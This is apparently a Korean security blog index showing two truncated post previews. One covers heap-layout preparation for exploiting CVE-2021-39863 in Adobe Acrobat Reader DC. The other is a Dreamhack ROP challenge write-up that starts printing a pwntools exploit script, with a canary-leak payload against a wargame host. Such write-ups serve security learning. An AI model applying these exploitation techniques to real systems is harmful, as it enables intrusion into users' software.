CVE-2021-39863 - Adobe Acrobat Reader DC 취약점 내용 정리
·
Security/Pwnable
내용 정리익스플로잇의 기본 흐름Preparing Heap Layout 과정검증 1분석 블로그를 보면 아래 글이 있다.The ArrayBuffer size is selected so the underlying allocationis of size 0x2608 (including the chunk metadata), which corresponds toan LFH bucket not used by the application. 왜 0x2608바이트 크기의 ArrayBuffer를 선택하였는가?리더기에서 사용되지 않는 할당 요청값이기 때문이다. 만약 리더기에서 자주 할당 및 해제하는 크기의 값을 ArrayBuffer로 선택한다면, 우리가 하려고 하는 작업인 UserBlock을 꽉 채우는 작업에 방해될 수 있기 ..
[Dreamhack] ROP(Return Oriented Programming) 문제 해설 & 추가 설명
·
Security/Pwnable
https://dreamhack.io/lecture/courses/84위 로드맵에서 설명이 부족한 부분들과 추가적인 배경 지식들을 정리하였습니다.우선 익스플로잇 코드부터 소개하겠습니다.from pwn import *def slog(n, m): return success(": ".join([n, hex(m)]))# context.log_level = "debug"p = remote("host3.dreamhack.games", 18495)# p = process("./rop", env= {"LD_PRELOAD" : "./libc.so.6"})elf = ELF("./rop")libc = ELF("./libc.so.6")# [1] Leak canarypadding = b"A" * 0x39p.sendafter(b..